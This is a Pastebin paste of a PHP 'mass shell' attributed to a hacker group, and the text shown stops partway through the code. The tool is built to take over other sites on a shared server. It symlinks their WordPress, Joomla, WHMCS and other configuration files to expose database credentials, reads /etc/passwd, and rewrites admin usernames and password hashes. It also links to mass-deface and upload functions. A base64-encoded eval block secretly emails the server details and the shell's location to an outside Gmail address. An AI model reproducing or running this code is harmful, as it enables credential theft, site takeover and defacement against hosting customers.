API tools faq
paste
3x5w4rup

UBH Mass Shell

3x5w4rup
Aug 23rd, 2014
704
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 38.86 KB | None | 0 0
raw download clone embed print report
  1.     <STYLE>
  2.     textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid
  3.      
  4.     #000000;}
  5.     input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border:
  6.      
  7.     1px solid #666666;height:20}
  8.     body {
  9.     font-family: Tahoma
  10.     }
  11.     tr {
  12.     BORDER: dashed 1px #333;
  13.     color: #FFF;
  14.     }
  15.     td {
  16.     BORDER: dashed 1px #333;
  17.     color: #FFF;
  18.     }
  19.     .table1 {
  20.     BORDER: 0px Black;
  21.     BACKGROUND-COLOR: Black;
  22.     color: #FFF;
  23.     }
  24.     .td1 {
  25.     BORDER: 0px;
  26.     BORDER-COLOR: #333333;
  27.     font: 7pt Verdana;
  28.     color: Green;
  29.     }
  30.     .tr1 {
  31.     BORDER: 0px;
  32.     BORDER-COLOR: #333333;
  33.     color: #FFF;
  34.     }
  35.     table {
  36.     BORDER: dashed 1px #333;
  37.     BORDER-COLOR: #333333;
  38.     BACKGROUND-COLOR: Black;
  39.     color: #FFF;
  40.     }
  41.     input {
  42.     border                  : dashed 1px;
  43.     border-color            : #333;
  44.     BACKGROUND-COLOR: Black;
  45.     font: 8pt Verdana;
  46.     color: Red;
  47.     }
  48.     select {
  49.     BORDER-RIGHT:  Black 1px solid;
  50.     BORDER-TOP:    #DF0000 1px solid;
  51.     BORDER-LEFT:   #DF0000 1px solid;
  52.     BORDER-BOTTOM: Black 1px solid;
  53.     BORDER-color: #FFF;
  54.     BACKGROUND-COLOR: Black;
  55.     font: 8pt Verdana;
  56.     color: Red;
  57.     }
  58.     submit {
  59.     BORDER:  buttonhighlight 2px outset;
  60.     BACKGROUND-COLOR: Black;
  61.     width: 30%;
  62.     color: #FFF;
  63.     }
  64.     textarea {
  65.     border                  : dashed 1px #333;
  66.     BACKGROUND-COLOR: Black;
  67.     font: Fixedsys bold;
  68.     color: #999;
  69.     }
  70.     BODY {
  71.             SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color:
  72.      
  73.     #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  74.     margin: 1px;
  75.     color: Red;
  76.     background-color: Black;
  77.     }
  78.     .main {
  79.     margin                  : -287px 0px 0px -490px;
  80.     BORDER: dashed 1px #333;
  81.     BORDER-COLOR: #333333;
  82.     }
  83.     .tt {
  84.     background-color: Black;
  85.     }
  86.      
  87.     A:link {
  88.             COLOR: White; TEXT-DECORATION: none
  89.     }
  90.     A:visited {
  91.             COLOR: White; TEXT-DECORATION: none
  92.     }
  93.     A:hover {
  94.             color: Red; TEXT-DECORATION: none
  95.     }
  96.     A:active {
  97.             color: Red; TEXT-DECORATION: none
  98.     }
  99.     </STYLE>
  100.      
  101.     <title>UBH Wordpress gun</title>
  102.      
  103.     <div align="center"><img src="http://s13.postimg.org/d82nq5frb/UBHFinal1.png" width="240" height="180"" />
  104.     </div>
  105.     <?php
  106.     set_time_limit(0);
  107.     error_reporting(0);
  108.      
  109.     $encoded = 'JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQokaXBfcmVtb3RlID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokZnJvbV9zaGVsbGNvZGUgPSAnc2hlbGxAJy5nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKS4nJzsNCiR0b19lbWFpbCA9ICd1bmtub3duYm95dWJoQGdtYWlsLmNvbSc7DQokc2VydmVyX21haWwgPSAiIi5nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKS4iICAtICIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiIiOw0KJGxpbmtjciA9ICJMaW5rOiAiLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiIiLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLiIgLSBJUCBFeGN1dGluZzogJGlwX3JlbW90ZSAtIFRpbWU6ICR0aW1lX3NoZWxsIjsNCiRoZWFkZXIgPSAiRnJvbTogJGZyb21fc2hlbGxjb2RlXHJcblJlcGx5LXRvOiAkZnJvbV9zaGVsbGNvZGUiOw0KQG1haWwoJHRvX2VtYWlsLCAkc2VydmVyX21haWwsICRsaW5rY3IsICRoZWFkZXIpOw==';
  110.     eval(base64_decode($encoded));
  111.      
  112.     $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
  113.      
  114.      
  115.      
  116.     ##.htaccess
  117.    @mkdir('pee',0777);
  118.     @symlink("/","pee/root");
  119.     @fopen('temp.txt','w');
  120.     $htaccss = "Options all
  121.    DirectoryIndex Sux.html
  122.    AddType text/plain .php
  123.    AddHandler server-parsed .php
  124.     AddType text/plain .html
  125.    AddHandler txt .html
  126.    Require None
  127.    Satisfy Any";
  128.      
  129.     file_put_contents("pee/.htaccess",$htaccss);
  130.      
  131.     if(is_readable("/var/named")){
  132.     $list = scandir("/var/named");
  133.     $current_dir = posix_getcwd();
  134.     $dir = explode("/",$current_dir);
  135.     foreach($list as $domain){
  136.     if(strpos($domain,".db"))
  137.     {
  138.             $domain = str_replace('.db','',$domain);
  139.             $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  140.            
  141.     error_reporting(0);
  142.      
  143.     $current_dir = posix_getcwd();
  144.     $dir = explode("/",$current_dir);
  145.      
  146.     symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
  147.     symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
  148.     symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
  149.     symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
  150.     symlink($owner['dir'].'/'.$dir[3].'/config.php',"pee/".$owner['name'].'-PhpBB.txt');
  151.     symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"pee/".$owner['name'].'-vBulletin.txt');
  152.     symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
  153.     symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
  154.     symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
  155.     symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
  156.     symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"pee/".$owner['name'].'-IPB.txt');
  157.     symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"pee/".$owner['name'].'-MyBB.txt');
  158.     symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"pee/".$owner['name'].'-SMF.txt');
  159.     symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"pee/".$owner['name'].'-Drupal.txt');
  160.     symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"pee/".$owner['name'].'-e107.txt');
  161.     symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"pee/".$owner['name'].'-Seditio.txt');
  162.     symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"pee/".$owner['name'].'-osCommerce.txt');
  163.     symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  164.     symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  165.     symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  166.     symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  167.     symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  168.     symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  169.     symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  170.     symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  171.     symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  172.     symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  173.     symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  174.     symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  175.     symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
  176.      
  177.     $link = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
  178.      
  179.     if(chk_header($link))
  180.             {
  181.                     $str = '<tr><td>'.$domain.'</td><td>'.$owner['name'].'</td><td>/WordPress</td>'.Chr(10);
  182.                     file_put_contents("temp.txt",$str,FILE_APPEND);
  183.             }
  184.      
  185.      
  186.      
  187.      
  188.     }
  189.     }
  190.     }
  191.      
  192.     $etc = file_get_contents("/etc/passwd");
  193.     $etcz = explode("\n",$etc);
  194.      
  195.     foreach($etcz as $etz){
  196.     $etcc = explode(":",$etz);
  197.     error_reporting(0);
  198.      
  199.     $current_dir = posix_getcwd();
  200.     $dir = explode("/",$current_dir);
  201.      
  202.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
  203.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
  204.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
  205.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
  206.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','pee/'.$etcc[0].'-PhpBB.txt');
  207.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','pee/'.$etcc[0].'-vBulletin.txt');
  208.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
  209.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
  210.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
  211.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
  212.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','pee/'.$etcc[0].'-IPB.txt');
  213.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','pee/'.$etcc[0].'-MyBB.txt');
  214.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','pee/'.$etcc[0].'-SMF.txt');
  215.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','pee/'.$etcc[0].'-Drupal.txt');
  216.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','pee/'.$etcc[0].'-e107.txt');
  217.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','pee/'.$etcc[0].'-Seditio.txt');
  218.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','pee/'.$etcc[0].'-osCommerce.txt');
  219.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  220.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  221.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  222.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  223.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  224.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  225.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  226.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  227.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  228.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  229.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  230.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  231.     symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
  232.     if(chk_header($link))
  233.             {
  234.                     $str = '<tr><td></td><td>'.$etcc[0].'</td><td>/WordPress</td>'.Chr(10);
  235.                     file_put_contents("temp.txt",$str,FILE_APPEND);
  236.             }
  237.     }
  238.      
  239.      
  240.      
  241.      
  242.     function chk_header($link){
  243.     $pee = get_headers($link,1);
  244.     if(strpos($pee[0],"200")){
  245.     return true;
  246.     }else{ return false; }
  247.     }
  248.      
  249.     function Find($str,$start,$end){
  250.     $len = strlen($str);
  251.     $start_pos = (strpos($str,$start) + strlen($start));
  252.     $str = substr($str,$start_pos);
  253.     $end_pos = strpos($str,$end);
  254.     $str = substr($str,0,$end_pos);
  255.     return $str;    
  256.     }
  257.      
  258.     $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  259.     $u = explode("/",$pageURL );
  260.     $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  261.      
  262.      
  263.     #######
  264.    function cms_add($link,$domain,$owner,$cms)
  265.     {
  266.            
  267.             $link = $link.'-'.$cms.'.txt';
  268.             if(chk_header($link))
  269.             {
  270.                     $url = 'http://'.$domain;
  271.                     $str = '<tr><td> <a href='.$url.'>'.$domain.'</a></td><td>'.$owner.'</td><td><a
  272.    
  273.    href='.$link.'>'.$cms.'</td>'.Chr(10);
  274.                     file_put_contents("pee.tmp",$str,FILE_APPEND);
  275.                     echo $str;
  276.                    
  277.             }
  278.     }
  279.      
  280.     function CurlPage($url,$post = null,$head = true) {
  281.     $ch = curl_init();
  282.     curl_setopt($ch, CURLOPT_URL, $url);
  283.     curl_setopt($ch, CURLOPT_HEADER, $head);
  284.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  285.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  286.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
  287.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
  288.     curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  289.      
  290.     curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  291.     curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  292.      
  293.     If ($post != NULL){
  294.     curl_setopt($ch, CURLOPT_POST, 1);
  295.     curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  296.     }
  297.     $urlPage = curl_exec($ch);
  298.      
  299.     if(curl_errno($ch)){
  300.     echo curl_error($ch);
  301.     }
  302.      
  303.     curl_close($ch);
  304.     return($urlPage);
  305.     }
  306.      
  307.      
  308.      
  309.     function listall($file,$str){
  310.     if(file_exists($file)){
  311.     $do = file_get_contents($file);
  312.     if(!strpos($do,$str)){
  313.     file_put_contents($file,$str,FILE_APPEND);
  314.     }
  315.     }else{
  316.     file_put_contents($file,$str,FILE_APPEND);
  317.     }
  318.     }
  319.      
  320.      
  321.      
  322.     echo "<center>
  323.    
  324.    <img src=''><br>
  325.    [ <a href='?do=cms_detect'>CmsDetector~</a> ] -- [ <a href='?do=pass_change'>MassPASSChange~</a> ] -- [ <a
  326.    
  327.    href='?do=wp_def'>Wp Mass Defacer</a> ] -- [ <a href='?do=uploader'>Uploader</a> ] -- [ <a href='https://facebook.com/United.Bangladeshi.Hackers'>Our page</a> ]<br><br><br></center> ";
  328.      
  329.     if(isset($_REQUEST['do'])){
  330.     switch ($_REQUEST['do']){
  331.      
  332.     ################CMS DETECTOR
  333.    case 'cms_detect':
  334.      
  335.     if(!file_exists('pee.tmp')){
  336.     @fopen('pee.tmp', 'w');
  337.      
  338.     echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  339.     echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';
  340.      
  341.     $p = 0;
  342.      
  343.     if(is_readable("/var/named")){
  344.     $list = scandir("/var/named");
  345.     $current_dir = posix_getcwd();
  346.     $dir = explode("/",$current_dir);
  347.     foreach($list as $domain){
  348.     if(strpos($domain,".db"))
  349.     {
  350.             $domain = str_replace('.db','',$domain);
  351.             $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  352.            
  353.     error_reporting(0);
  354.      
  355.     $link = $pageURL.'pee/'.$owner['name'];
  356.      
  357.     cms_add($link,$domain,$owner['name'],"WordPress");
  358.     cms_add($link,$domain,$owner['name'],"Joomla");
  359.     cms_add($link,$domain,$owner['name'],"vBulletin");
  360.     cms_add($link,$domain,$owner['name'],"WHMCS");
  361.     cms_add($link,$domain,$owner['name'],"PhpBB");
  362.     cms_add($link,$domain,$owner['name'],"MyBB");
  363.     cms_add($link,$domain,$owner['name'],"IPB");
  364.     cms_add($link,$domain,$owner['name'],"SMF");
  365.     cms_add($link,$domain,$owner['name'],"Drupal");
  366.     cms_add($link,$domain,$owner['name'],"e107");
  367.     cms_add($link,$domain,$owner['name'],"Seditio");
  368.     cms_add($link,$domain,$owner['name'],"osCommerce");
  369.      
  370.     }
  371.     }
  372.     }
  373.     }else{
  374.     echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  375.     echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';
  376.     $content = file_get_contents($pageURL.'pee.tmp');
  377.     echo $content;
  378.     }
  379.     break;
  380.      
  381.      
  382.      
  383.     ################MASS DEFACE
  384.    case 'pass_change':
  385.      
  386.     echo <<<PEE
  387.     <form method='POST'>
  388.     <center>
  389.     USER : <input size='20' value='bu' name='user' type='text'><br>
  390.     PASS : <input size='20' value='bu' name='pass' type='text'>
  391.     <br>
  392.     <input value='Change' name='' type='submit'><br><br>
  393.     </form>
  394.      
  395.     PEE;
  396.      
  397.     if($_POST){
  398.     ################### USER & PASS ################
  399.    $user = $_POST['user'];
  400.     $pass = $_POST['pass'];
  401.     ################################################
  402.    
  403.      
  404.     if(is_readable("/var/named"))
  405.     {
  406.            
  407.             echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
  408.             echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
  409.             $list = scandir("/var/named");
  410.             foreach($list as $domain){
  411.             if(strpos($domain,".db"))
  412.             {
  413.                     $domain = str_replace('.db','',$domain);
  414.                     $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  415.                     $url = 'http://'.$domain;
  416.                     if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
  417.                     {
  418.                             $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
  419.                            
  420.                             file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
  421.                             ##GET DATABASE INFO FROM CONFIGURATION FILE
  422.                            $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
  423.                             $hostname = Find($cnf,"define('DB_HOST', '","');");
  424.                             $username = Find($cnf,"define('DB_USER', '","');");
  425.                             $password = Find($cnf,"define('DB_PASSWORD', '","');");
  426.                             $dbname = Find($cnf,"define('DB_NAME', '","');");
  427.                             $prefix = Find($cnf,"table_prefix  = '","'");
  428.                            
  429.                             $link=mysql_connect($hostname,$username,$password);
  430.                            
  431.                             if ($link)
  432.                             {
  433.                                     $hash = crypt($pass);
  434.                                     mysql_select_db($dbname,$link) ;
  435.                                     $tab = $prefix.'users';                
  436.                                     $query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
  437.                                     $query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
  438.                                     $req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  439.                                     $data = mysql_fetch_array($req);
  440.                                     $site_url=$data["option_value"];
  441.                                    
  442.                                     error_reporting(0);
  443.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  444.    
  445.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font
  446.    
  447.    color="green">success..</font></td>';
  448.                                    
  449.                             }else{
  450.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  451.    
  452.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql
  453.    
  454.    fail</font></td>';
  455.                             }
  456.                    
  457.                            
  458.                    
  459.                    
  460.                     }
  461.                    
  462.                    
  463.                    
  464.                     elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt'))
  465.                     {
  466.                    
  467.                     ##GET DATABASE INFO FROM CONFIGURATION FILE
  468.                            $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt');
  469.                             $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
  470.                            
  471.                             if(preg_match('%(JConfig|mosConfig)%',$cnf)){
  472.                            
  473.                             ######
  474.                            if(preg_match('%JConfig%', $cnf)){
  475.                             $username=Find($cnf,"\$user = '","'");
  476.                             $password=Find($cnf,"\$password = '","'");
  477.                             $dbname=Find($cnf,"\$db = '","'");
  478.                             $prefix=Find($cnf,"\$dbprefix = '","'");
  479.                            
  480.                            
  481.                             $link=mysql_connect("localhost",$username,$password);
  482.                            
  483.                             if ($link)
  484.                             {
  485.                                     $hash = md5($user);
  486.                                     mysql_select_db($dbname,$link) ;
  487.                                     $tab = $prefix.'users';                
  488.                                     $query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
  489.                                     $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
  490.                                    
  491.                             echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  492.    
  493.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
  494.    
  495.    color="green">success..</font><br>';
  496.      
  497.                             }else{
  498.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  499.    
  500.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
  501.    
  502.    fail</font></td>';
  503.                             }
  504.                            
  505.                             }
  506.                            
  507.                             #####
  508.                            elseif(preg_match('%mosConfig%',$cnf)){
  509.                             $username=Find($cnf,"\$mosConfig_user = '","'");
  510.                             $password=Find($cnf,"\$mosConfig_password = '","'");
  511.                             $dbname=Find($cnf,"\$mosConfig_db = '","'");
  512.                             $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
  513.                             $pwd = md5($npass);
  514.                            
  515.                             $link=mysql_connect("localhost",$username,$password);
  516.                            
  517.                             if ($link)
  518.                             {
  519.                                     $hash = md5($pass);
  520.                                     mysql_select_db($dbname,$link) ;
  521.                                     $tab = $prefix.'users';                
  522.                                     $query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
  523.                                     $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
  524.                                    
  525.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  526.    
  527.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
  528.    
  529.    color="green">success..</font><br>';
  530.      
  531.                             }else{
  532.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  533.    
  534.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
  535.    
  536.    fail</font></td>';
  537.                             }
  538.                            
  539.                             }
  540.                            
  541.                            
  542.                             }
  543.                             #########
  544.                          
  545.                            
  546.                     }
  547.             }
  548.     }
  549.     }
  550.      
  551.     elseif(is_readable("/etc/passwd")){
  552.      
  553.     echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
  554.     echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
  555.                            
  556.     foreach($etcz as $etz){
  557.     $etcc = explode(":",$etz);
  558.      
  559.      
  560.     if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt'))
  561.                     {
  562.                            
  563.                             $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
  564.                             file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
  565.                             ##GET DATABASE INFO FROM CONFIGURATION FILE
  566.                            $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
  567.                             $hostname = Find($cnf,"define('DB_HOST', '","');");
  568.                             $username = Find($cnf,"define('DB_USER', '","');");
  569.                             $password = Find($cnf,"define('DB_PASSWORD', '","');");
  570.                             $dbname = Find($cnf,"define('DB_NAME', '","');");
  571.                             $prefix = Find($cnf,"table_prefix  = '","'");
  572.                            
  573.                             $link=mysql_connect($hostname,$username,$password);
  574.                            
  575.                             if ($link)
  576.                             {
  577.                                    
  578.                                     $hash = crypt($user);
  579.                                     mysql_select_db($dbname,$link) ;
  580.                                     $req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  581.                                     $data = mysql_fetch_array($req);
  582.                                     $site_url=$data["option_value"];
  583.                                     $tab = $prefix.'users';                
  584.                                     $query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
  585.                                     $query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
  586.                                    
  587.                                     error_reporting(0);
  588.                                    
  589.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  590.    
  591.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font
  592.    
  593.    color="green">success..</font><br>';
  594.      
  595.                             }else{
  596.                                     echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  597.    
  598.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql
  599.    
  600.    fail</font></td>';
  601.                             }
  602.                    
  603.                            
  604.                    
  605.                    
  606.                     }
  607.                    
  608.                    
  609.                    
  610.                     elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt'))
  611.                     {
  612.                    
  613.                     ##GET DATABASE INFO FROM CONFIGURATION FILE
  614.                            $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt');
  615.                             $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
  616.                            
  617.                             if(preg_match('%(JConfig|mosConfig)%',$cnf)){
  618.                            
  619.                             ######
  620.                            if(preg_match('%JConfig%', $cnf)){
  621.                             $username=Find($cnf,"\$user = '","'");
  622.                             $password=Find($cnf,"\$password = '","'");
  623.                             $dbname=Find($cnf,"\$db = '","'");
  624.                             $prefix=Find($cnf,"\$dbprefix = '","'");
  625.                             $site_url = Find($cnf,"\$mailfrom = '","'");
  626.                             $site_url = explode("@",$site_url);
  627.                            
  628.                            
  629.                            
  630.                             $link=mysql_connect("localhost",$username,$password);
  631.                            
  632.                             if ($link)
  633.                             {
  634.                                     $hash = md5($pass);
  635.                                     mysql_select_db($dbname,$link) ;
  636.                                     $tab = $prefix.'users';                
  637.                                     $query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
  638.                                     $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
  639.                             echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
  640.    
  641.    false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
  642.    
